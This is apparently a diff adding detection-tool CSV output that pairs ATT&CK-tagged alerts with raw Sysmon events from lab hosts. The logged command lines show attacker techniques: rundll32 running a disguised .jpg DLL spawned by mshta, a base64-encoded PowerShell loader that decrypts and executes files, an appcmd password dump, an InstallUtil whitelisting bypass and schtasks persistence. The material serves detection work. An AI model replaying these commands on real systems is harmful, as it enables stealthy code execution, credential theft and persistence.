+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
+    <Data Name=""LogonId"">0x7a857</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
+    <Data Name=""ParentProcessId"">9932</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
+    </TimeCreated>
+    <EventRecordID>556863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3232"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
+    <Data Name=""ProcessId"">6576</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
+    <Data Name=""LogonId"">0x7a857</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
+    <Data Name=""ParentProcessId"">9932</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
+    </TimeCreated>
+    <EventRecordID>556863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3232"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
+    <Data Name=""ProcessId"">6576</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
+    <Data Name=""LogonId"">0x7a857</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
+    <Data Name=""ParentProcessId"">9932</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Line Number: 0&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.784314Z"">
+    </TimeCreated>
+    <EventRecordID>5967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.714</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010F2CFFF00</Data>
+    <Data Name=""ProcessId"">3844</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Line Number: 0&quot; /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-11T23:22:26.650196Z"">
+    </TimeCreated>
+    <EventRecordID>142033</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2896"" ThreadID=""3548"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-11 23:22:26.451</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DE32-5EB9-0000-00103FC14300</Data>
+    <Data Name=""ProcessId"">5252</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">svchost.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-5461-5EBA-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">580</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T12:06:55.820406Z"">
+    </TimeCreated>
+    <EventRecordID>5435</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 12:06:55.471</Data>
+    <Data Name=""ProcessGuid"">747F3D96-78DF-5D45-0000-0010EF400401</Data>
+    <Data Name=""ProcessId"">4320</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-78DF-5D45-0000-0010BD350401</Data>
+    <Data Name=""ParentProcessId"">5756</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\Dism.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\dism.exe&quot; /online /norestart /apply-unattend:&quot;C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-07T23:33:01.176666Z"">
+    </TimeCreated>
+    <EventRecordID>556726</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3232"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-07 23:33:01.121</Data>
+    <Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00100344D300</Data>
+    <Data Name=""ProcessId"">11196</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">svchost.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
+    <Data Name=""LogonGuid"">747F3D96-90AF-610F-0000-0020E5030000</Data>
+    <Data Name=""LogonId"">0x3e5</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">632</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks  /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:57:36.631669Z"">
+    </TimeCreated>
+    <EventRecordID>424079</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:57:36.627</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001079C05B00</Data>
+    <Data Name=""ProcessId"">8572</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\schtasks.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Task Scheduler Configuration Tool</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">schtasks.exe</Data>
+    <Data Name=""CommandLine"">schtasks  /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
+    <Data Name=""LogonId"">0x8a585</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51D0-5F93-0000-0010B2B35B00</Data>
+    <Data Name=""ParentProcessId"">5572</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot;  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:08.202018Z"">
+    </TimeCreated>
+    <EventRecordID>4897</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:08.174</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6614-5D3F-0000-001093CE8600</Data>
+    <Data Name=""ProcessId"">108</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll</Data>
